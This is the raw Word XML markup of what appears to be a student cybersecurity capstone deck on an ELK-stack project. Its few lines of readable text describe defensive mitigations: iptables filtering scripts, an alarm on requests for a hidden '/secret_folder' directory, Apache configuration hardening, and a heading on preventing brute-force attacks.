                          <w:t>Dropping packets Port scan protection Removal of attacking</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="3510343F" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:line="271" w:lineRule="auto"/>
                          <w:ind w:left="449"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Carlito"/>
                            <w:b/>
                            <w:sz w:val="20"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Carlito"/>
                            <w:b/>
                            <w:sz w:val="20"/>
                          </w:rPr>
                          <w:t>Outright rejection of all input traffic (the excepted ports are in the OUTPUT script)</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="49B1218A" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:before="1" w:line="271" w:lineRule="auto"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Carlito"/>
                            <w:b/>
                            <w:sz w:val="20"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Carlito"/>
                            <w:b/>
                            <w:sz w:val="20"/>
                          </w:rPr>
                          <w:t>The OUTPUT script is necessary to allow certain ports to be open for proper website functionality.</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="2B607E01" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:ind w:right="20"/>
                          <w:jc w:val="right"/>
                          <w:rPr>
                            <w:sz w:val="20"/>
                          </w:rPr>
                        </w:pPr>
                        <w:hyperlink r:id="rId49">
                          <w:r>
                            <w:rPr>
                              <w:color w:val="0070BF"/>
                              <w:spacing w:val="-2"/>
                              <w:sz w:val="20"/>
                              <w:u w:val="single" w:color="0070BF"/>
                            </w:rPr>
                            <w:t>https://github.com/dbaimakov/ELK-Stack_project_1/blob/main/Scri</w:t>
                          </w:r>
                        </w:hyperlink>
                      </w:p>
                      <w:p w14:paraId="2FCEC228" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:before="36" w:line="239" w:lineRule="exact"/>
                          <w:ind w:right="18"/>
                          <w:jc w:val="right"/>
                          <w:rPr>
                            <w:sz w:val="20"/>
                          </w:rPr>
                        </w:pPr>
                        <w:hyperlink r:id="rId50">
                          <w:r>
                            <w:rPr>
                              <w:color w:val="0070BF"/>
                              <w:sz w:val="20"/>
                              <w:u w:val="single" w:color="0070BF"/>
                            </w:rPr>
                            <w:t>pts/INPUTiptablescript.sh</w:t>
                          </w:r>
                        </w:hyperlink>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="Text Box 53" o:spid="_x0000_s1079" type="#_x0000_t202" style="position:absolute;left:7145;top:3864;width:6034;height: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2974399C" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:line="236" w:lineRule="exact"/>
                          <w:ind w:right="20"/>
                          <w:jc w:val="right"/>
                          <w:rPr>
                            <w:sz w:val="20"/>
                          </w:rPr>
                        </w:pPr>
                        <w:hyperlink r:id="rId51">
                          <w:r>
                            <w:rPr>
                              <w:color w:val="0070BF"/>
                              <w:spacing w:val="-2"/>
                              <w:sz w:val="20"/>
                              <w:u w:val="single" w:color="0070BF"/>
                            </w:rPr>
                            <w:t>https://github.com/dbaimakov/ELK-Stack_project_1/blob/main/Scri</w:t>
                          </w:r>
                        </w:hyperlink>
                      </w:p>
                      <w:p w14:paraId="6AD2CFAA" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:before="36" w:line="239" w:lineRule="exact"/>
                          <w:ind w:right="18"/>
                          <w:jc w:val="right"/>
                          <w:rPr>
                            <w:sz w:val="20"/>
                          </w:rPr>
                        </w:pPr>
                        <w:hyperlink r:id="rId52">
                          <w:r>
                            <w:rPr>
                              <w:color w:val="0070BF"/>
                              <w:sz w:val="20"/>
                              <w:u w:val="single" w:color="0070BF"/>
                            </w:rPr>
                            <w:t>pts/OUTPUTiptablets.sh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CC2263E" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
        </w:rPr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space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F41BFCA" w14:textId="3203DAB0" w:rsidR="00377979" w:rsidRDefault="000A2543">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="1047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21120" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="66669B36" wp14:editId="0515D7C9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61" name="Lin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094263" id="Line 51" o:spid="_x0000_s1026" style="position:absolute;z-index:-1569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" strokecolor="#595959">
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006B15D1">
        <w:t>Mitigation: Finding the Request for the Hidden Directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686762C0" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61444CB2" w14:textId="763492AF" w:rsidR="00377979" w:rsidRDefault="000A2543">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7493"/>
        </w:tabs>
        <w:ind w:left="440"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
        </w:rPr>
      </w:pP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095D4E9F" wp14:editId="1E6079FD">
                <wp:extent cx="2688590" cy="534035"/>
                <wp:effectExtent l="0" t="6985" r="6985" b="1905"/>
                <wp:docPr id="5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0" y="0"/>
                          <a:chExt cx="4234" cy="841"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="59" name="Freeform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custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 4234 w 4234"/>
                              <a:gd name="T1" fmla="*/ 125 h 841"/>
                              <a:gd name="T2" fmla="*/ 4213 w 4234"/>
                              <a:gd name="T3" fmla="*/ 56 h 841"/>
                              <a:gd name="T4" fmla="*/ 4156 w 4234"/>
                              <a:gd name="T5" fmla="*/ 10 h 841"/>
                              <a:gd name="T6" fmla="*/ 4108 w 4234"/>
                              <a:gd name="T7" fmla="*/ 0 h 841"/>
                              <a:gd name="T8" fmla="*/ 125 w 4234"/>
                              <a:gd name="T9" fmla="*/ 0 h 841"/>
                              <a:gd name="T10" fmla="*/ 76 w 4234"/>
                              <a:gd name="T11" fmla="*/ 10 h 841"/>
                              <a:gd name="T12" fmla="*/ 37 w 4234"/>
                              <a:gd name="T13" fmla="*/ 37 h 841"/>
                              <a:gd name="T14" fmla="*/ 10 w 4234"/>
                              <a:gd name="T15" fmla="*/ 76 h 841"/>
                              <a:gd name="T16" fmla="*/ 0 w 4234"/>
                              <a:gd name="T17" fmla="*/ 125 h 841"/>
                              <a:gd name="T18" fmla="*/ 0 w 4234"/>
                              <a:gd name="T19" fmla="*/ 626 h 841"/>
                              <a:gd name="T20" fmla="*/ 10 w 4234"/>
                              <a:gd name="T21" fmla="*/ 674 h 841"/>
                              <a:gd name="T22" fmla="*/ 37 w 4234"/>
                              <a:gd name="T23" fmla="*/ 714 h 841"/>
                              <a:gd name="T24" fmla="*/ 76 w 4234"/>
                              <a:gd name="T25" fmla="*/ 741 h 841"/>
                              <a:gd name="T26" fmla="*/ 125 w 4234"/>
                              <a:gd name="T27" fmla="*/ 751 h 841"/>
                              <a:gd name="T28" fmla="*/ 294 w 4234"/>
                              <a:gd name="T29" fmla="*/ 751 h 841"/>
                              <a:gd name="T30" fmla="*/ 364 w 4234"/>
                              <a:gd name="T31" fmla="*/ 840 h 841"/>
                              <a:gd name="T32" fmla="*/ 434 w 4234"/>
                              <a:gd name="T33" fmla="*/ 751 h 841"/>
                              <a:gd name="T34" fmla="*/ 4108 w 4234"/>
                              <a:gd name="T35" fmla="*/ 751 h 841"/>
                              <a:gd name="T36" fmla="*/ 4157 w 4234"/>
                              <a:gd name="T37" fmla="*/ 741 h 841"/>
                              <a:gd name="T38" fmla="*/ 4197 w 4234"/>
                              <a:gd name="T39" fmla="*/ 714 h 841"/>
                              <a:gd name="T40" fmla="*/ 4224 w 4234"/>
                              <a:gd name="T41" fmla="*/ 674 h 841"/>
                              <a:gd name="T42" fmla="*/ 4234 w 4234"/>
                              <a:gd name="T43" fmla="*/ 626 h 841"/>
                              <a:gd name="T44" fmla="*/ 4234 w 4234"/>
                              <a:gd name="T45" fmla="*/ 125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3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4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294" y="751"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="364" y="840"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="434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4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5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1D8646" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                              <w:pPr>
                                <w:spacing w:before="86"/>
                                <w:ind w:left="1523" w:right="1525"/>
                                <w:jc w:val="center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Alarm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D4E9F" id="Group 48" o:spid="_x0000_s1080" style="width:211.7pt;height:42.05pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line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">
                <v:shape id="Freeform 50" o:spid="_x0000_s1081" style="position:absolute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" path="m4234,125l4213,56,4156,10,4108,,125,,76,10,37,37,10,76,,125,,626r10,48l37,714r39,27l125,751r169,l364,840r70,-89l4108,751r49,-10l4197,714r27,-40l4234,626r,-501xe" fillcolor="#3d85c6" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4234,125;4213,56;4156,10;4108,0;125,0;76,10;37,37;10,76;0,125;0,626;10,674;37,714;76,741;125,751;294,751;364,840;434,751;4108,751;4157,741;4197,714;4224,674;4234,626;4234,125" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 49" o:spid="_x0000_s1082" type="#_x0000_t202" style="position:absolute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1F1D8646" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:before="86"/>
                          <w:ind w:left="1523" w:right="1525"/>
                          <w:jc w:val="center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Alarm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6B15D1">
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
        </w:rPr>
        <w:tab/>
      </w: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52E9B712" wp14:editId="701C19DA">
                <wp:extent cx="2688590" cy="534035"/>
                <wp:effectExtent l="1905" t="6985" r="5080" b="1905"/>
                <wp:docPr id="5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0" y="0"/>
                          <a:chExt cx="4234" cy="841"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="56" name="Freeform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custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 4234 w 4234"/>
                              <a:gd name="T1" fmla="*/ 125 h 841"/>
                              <a:gd name="T2" fmla="*/ 4212 w 4234"/>
                              <a:gd name="T3" fmla="*/ 56 h 841"/>
                              <a:gd name="T4" fmla="*/ 4156 w 4234"/>
                              <a:gd name="T5" fmla="*/ 10 h 841"/>
                              <a:gd name="T6" fmla="*/ 4108 w 4234"/>
                              <a:gd name="T7" fmla="*/ 0 h 841"/>
                              <a:gd name="T8" fmla="*/ 125 w 4234"/>
                              <a:gd name="T9" fmla="*/ 0 h 841"/>
                              <a:gd name="T10" fmla="*/ 76 w 4234"/>
                              <a:gd name="T11" fmla="*/ 10 h 841"/>
                              <a:gd name="T12" fmla="*/ 37 w 4234"/>
                              <a:gd name="T13" fmla="*/ 37 h 841"/>
                              <a:gd name="T14" fmla="*/ 10 w 4234"/>
                              <a:gd name="T15" fmla="*/ 76 h 841"/>
                              <a:gd name="T16" fmla="*/ 0 w 4234"/>
                              <a:gd name="T17" fmla="*/ 125 h 841"/>
                              <a:gd name="T18" fmla="*/ 0 w 4234"/>
                              <a:gd name="T19" fmla="*/ 626 h 841"/>
                              <a:gd name="T20" fmla="*/ 10 w 4234"/>
                              <a:gd name="T21" fmla="*/ 674 h 841"/>
                              <a:gd name="T22" fmla="*/ 37 w 4234"/>
                              <a:gd name="T23" fmla="*/ 714 h 841"/>
                              <a:gd name="T24" fmla="*/ 76 w 4234"/>
                              <a:gd name="T25" fmla="*/ 741 h 841"/>
                              <a:gd name="T26" fmla="*/ 125 w 4234"/>
                              <a:gd name="T27" fmla="*/ 751 h 841"/>
                              <a:gd name="T28" fmla="*/ 339 w 4234"/>
                              <a:gd name="T29" fmla="*/ 751 h 841"/>
                              <a:gd name="T30" fmla="*/ 420 w 4234"/>
                              <a:gd name="T31" fmla="*/ 840 h 841"/>
                              <a:gd name="T32" fmla="*/ 501 w 4234"/>
                              <a:gd name="T33" fmla="*/ 751 h 841"/>
                              <a:gd name="T34" fmla="*/ 4108 w 4234"/>
                              <a:gd name="T35" fmla="*/ 751 h 841"/>
                              <a:gd name="T36" fmla="*/ 4157 w 4234"/>
                              <a:gd name="T37" fmla="*/ 741 h 841"/>
                              <a:gd name="T38" fmla="*/ 4197 w 4234"/>
                              <a:gd name="T39" fmla="*/ 714 h 841"/>
                              <a:gd name="T40" fmla="*/ 4224 w 4234"/>
                              <a:gd name="T41" fmla="*/ 674 h 841"/>
                              <a:gd name="T42" fmla="*/ 4234 w 4234"/>
                              <a:gd name="T43" fmla="*/ 626 h 841"/>
                              <a:gd name="T44" fmla="*/ 4234 w 4234"/>
                              <a:gd name="T45" fmla="*/ 125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2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4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339" y="751"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="420" y="840"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="501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4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86BB8" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                              <w:pPr>
                                <w:spacing w:before="86"/>
                                <w:ind w:left="423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System Hardening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9B712" id="Group 45" o:spid="_x0000_s1083" style="width:211.7pt;height:42.05pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line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">
                <v:shape id="Freeform 47" o:spid="_x0000_s1084" style="position:absolute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" path="m4234,125l4212,56,4156,10,4108,,125,,76,10,37,37,10,76,,125,,626r10,48l37,714r39,27l125,751r214,l420,840r81,-89l4108,751r49,-10l4197,714r27,-40l4234,626r,-501xe" fillcolor="#365b8a" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4234,125;4212,56;4156,10;4108,0;125,0;76,10;37,37;10,76;0,125;0,626;10,674;37,714;76,741;125,751;339,751;420,840;501,751;4108,751;4157,741;4197,714;4224,674;4234,626;4234,125" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 46" o:spid="_x0000_s1085" type="#_x0000_t202" style="position:absolute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1C086BB8" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:before="86"/>
                          <w:ind w:left="423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System Hardening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3F268D" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto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55B6B98D" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="889"/>
          <w:tab w:val="left" w:pos="890"/>
        </w:tabs>
        <w:spacing w:before="55"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Set an alert to detect unauthorized access requests</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-24"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF93741" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="17" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="889" w:right="485"/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704401F4" wp14:editId="7C0BF2A3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>249097</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>390785</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3850904" cy="2824744"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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904" cy="282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b/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
        </w:rPr>
        <w:t>secret</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
        </w:rPr>
        <w:t>_folder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>directory, which would trigger an alarm if any external IP address attempts access at any time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC99B12" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="532"/>
          <w:tab w:val="left" w:pos="533"/>
        </w:tabs>
        <w:spacing w:line="210" w:lineRule="exact"/>
        <w:ind w:hanging="421"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="column"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Edit the conﬁguration of the host ﬁle (usually it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-19"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>would</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4ECEF1" w14:textId="5AA69100" w:rsidR="00377979" w:rsidRDefault="000A2543">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="36" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="532" w:right="124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95648" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="716840F0" wp14:editId="0F6617AA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>269240</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-838835</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="8644255" cy="4180840"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="5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44255" cy="4180840"/>
                          <a:chOff x="424" y="-1321"/>
                          <a:chExt cx="13613" cy="6584"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="51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9" y="-1322"/>
                            <a:ext cx="187" cy="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2" y="1460"/>
                            <a:ext cx="3746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432" y="5238"/>
                            <a:ext cx="13536" cy="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4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9" y="3161"/>
                            <a:ext cx="6838" cy="2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2FED58" id="Group 40" o:spid="_x0000_s1026" style="position:absolute;margin-left:21.2pt;margin-top:-66.05pt;width:680.65pt;height:329.2pt;z-index:-16120832;mso-position-horizontal-relative:page" coordorigin="424,-1321" coordsize="13613,65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93+o/6+f8A&#10;67SVFL/qF/65p/M0UVnT+E0e4j/dj/66H+T1/IF/wXa/5SmfFT/sKR/+gLRRWhMj5Doooo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">
                <v:shape id="Picture 44" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;left:7219;top:-1322;width:187;height:6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">
                  <v:imagedata r:id="rId56" o:title=""/>
                </v:shape>
                <v:shape id="Picture 43" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:7322;top:1460;width:3746;height:1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">
                  <v:imagedata r:id="rId57" o:title=""/>
                </v:shape>
                <v:line id="Line 42" o:spid="_x0000_s1029" style="position:absolute;visibility:visible;mso-wrap-style:square" from="432,5238" to="13968,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" strokecolor="#a8b6bf"/>
                <v:shape id="Picture 41" o:spid="_x0000_s1030" type="#_x0000_t75" style="position:absolute;left:7199;top:3161;width:6838;height:2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">
                  <v:imagedata r:id="rId58" o:title=""/>
                </v:shape>
                <w10:wrap anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B15D1">
        <w:t>be</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B15D1">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B15D1">
        <w:t>httpd.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B15D1">
        <w:t xml:space="preserve"> ﬁle but since we are using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B15D1">
        <w:t>apache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B15D1">
        <w:t xml:space="preserve"> logs in the ‘capstone machine’ conf. ﬁle should be edited from the /apache2.conf) to block all outside access to the “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B15D1">
        <w:t>secret_folder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B15D1">
        <w:t>” from any IP other than the ones listed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7365BF60" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/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num="2" w:space="720" w:equalWidth="0">
            <w:col w:w="6217" w:space="1065"/>
            <w:col w:w="6658"/>
          </w:cols>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="216BBF30" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Mitigation: Preventing Brute Force Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D924AE9" w14:textId="79FCA2B1" w:rsidR="00377979" w:rsidRDefault="000A2543">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial"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47901C6A" wp14:editId="1670A1D2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>274320</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>102235</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="8595360" cy="10160"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="49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984918" id="Line 39" o:spid="_x0000_s1026" style="position:absolute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8.05pt" to="698.4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" strokecolor="#595959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7E9EF7A1" wp14:editId="6A1B8841">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>457200</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>349885</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2688590" cy="534035"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="4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720" y="551"/>
                          <a:chExt cx="4234" cy="841"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="47" name="Freeform 38"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="720" y="551"/>
                            <a:ext cx="4234" cy="841"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 4954 720"/>
                              <a:gd name="T1" fmla="*/ T0 w 4234"/>
                              <a:gd name="T2" fmla="+- 0 676 551"/>
                              <a:gd name="T3" fmla="*/ 676 h 841"/>
                              <a:gd name="T4" fmla="+- 0 4933 720"/>
                              <a:gd name="T5" fmla="*/ T4 w 4234"/>
                              <a:gd name="T6" fmla="+- 0 607 551"/>
                              <a:gd name="T7" fmla="*/ 607 h 841"/>
                              <a:gd name="T8" fmla="+- 0 4876 720"/>
                              <a:gd name="T9" fmla="*/ T8 w 4234"/>
                              <a:gd name="T10" fmla="+- 0 561 551"/>
                              <a:gd name="T11" fmla="*/ 561 h 841"/>
                              <a:gd name="T12" fmla="+- 0 4828 720"/>
                              <a:gd name="T13" fmla="*/ T12 w 4234"/>
                              <a:gd name="T14" fmla="+- 0 551 551"/>
                              <a:gd name="T15" fmla="*/ 551 h 841"/>
                              <a:gd name="T16" fmla="+- 0 845 720"/>
                              <a:gd name="T17" fmla="*/ T16 w 4234"/>
                              <a:gd name="T18" fmla="+- 0 551 551"/>
                              <a:gd name="T19" fmla="*/ 551 h 841"/>
                              <a:gd name="T20" fmla="+- 0 796 720"/>
                              <a:gd name="T21" fmla="*/ T20 w 4234"/>
                              <a:gd name="T22" fmla="+- 0 561 551"/>
                              <a:gd name="T23" fmla="*/ 561 h 841"/>
                              <a:gd name="T24" fmla="+- 0 757 720"/>
                              <a:gd name="T25" fmla="*/ T24 w 4234"/>
                              <a:gd name="T26" fmla="+- 0 588 551"/>
                              <a:gd name="T27" fmla="*/ 588 h 841"/>
                              <a:gd name="T28" fmla="+- 0 730 720"/>
                              <a:gd name="T29" fmla="*/ T28 w 4234"/>
                              <a:gd name="T30" fmla="+- 0 628 551"/>
                              <a:gd name="T31" fmla="*/ 628 h 841"/>
                              <a:gd name="T32" fmla="+- 0 720 720"/>
                              <a:gd name="T33" fmla="*/ T32 w 4234"/>
                              <a:gd name="T34" fmla="+- 0 676 551"/>
                              <a:gd name="T35" fmla="*/ 676 h 841"/>
                              <a:gd name="T36" fmla="+- 0 720 720"/>
                              <a:gd name="T37" fmla="*/ T36 w 4234"/>
                              <a:gd name="T38" fmla="+- 0 1177 551"/>
                              <a:gd name="T39" fmla="*/ 1177 h 841"/>
                              <a:gd name="T40" fmla="+- 0 730 720"/>
                              <a:gd name="T41" fmla="*/ T40 w 4234"/>
                              <a:gd name="T42" fmla="+- 0 1226 551"/>
                              <a:gd name="T43" fmla="*/ 1226 h 841"/>
                              <a:gd name="T44" fmla="+- 0 757 720"/>
                              <a:gd name="T45" fmla="*/ T44 w 4234"/>
                              <a:gd name="T46" fmla="+- 0 1265 551"/>
                              <a:gd name="T47" fmla="*/ 1265 h 841"/>
                              <a:gd name="T48" fmla="+- 0 796 720"/>
                              <a:gd name="T49" fmla="*/ T48 w 4234"/>
                              <a:gd name="T50" fmla="+- 0 1292 551"/>
                              <a:gd name="T51" fmla="*/ 1292 h 841"/>
                              <a:gd name="T52" fmla="+- 0 845 720"/>
                              <a:gd name="T53" fmla="*/ T52 w 4234"/>
                              <a:gd name="T54" fmla="+- 0 1302 551"/>
                              <a:gd name="T55" fmla="*/ 1302 h 841"/>
                              <a:gd name="T56" fmla="+- 0 1014 720"/>
                              <a:gd name="T57" fmla="*/ T56 w 4234"/>
                              <a:gd name="T58" fmla="+- 0 1302 551"/>
                              <a:gd name="T59" fmla="*/ 1302 h 841"/>
                              <a:gd name="T60" fmla="+- 0 1084 720"/>
                              <a:gd name="T61" fmla="*/ T60 w 4234"/>
                              <a:gd name="T62" fmla="+- 0 1391 551"/>
                              <a:gd name="T63" fmla="*/ 1391 h 841"/>
                              <a:gd name="T64" fmla="+- 0 1154 720"/>
                              <a:gd name="T65" fmla="*/ T64 w 4234"/>
                              <a:gd name="T66" fmla="+- 0 1302 551"/>
                              <a:gd name="T67" fmla="*/ 1302 h 841"/>
                              <a:gd name="T68" fmla="+- 0 4828 720"/>
                              <a:gd name="T69" fmla="*/ T68 w 4234"/>
                              <a:gd name="T70" fmla="+- 0 1302 551"/>
                              <a:gd name="T71" fmla="*/ 1302 h 841"/>
                              <a:gd name="T72" fmla="+- 0 4877 720"/>
                              <a:gd name="T73" fmla="*/ T72 w 4234"/>
                              <a:gd name="T74" fmla="+- 0 1292 551"/>
                              <a:gd name="T75" fmla="*/ 1292 h 841"/>
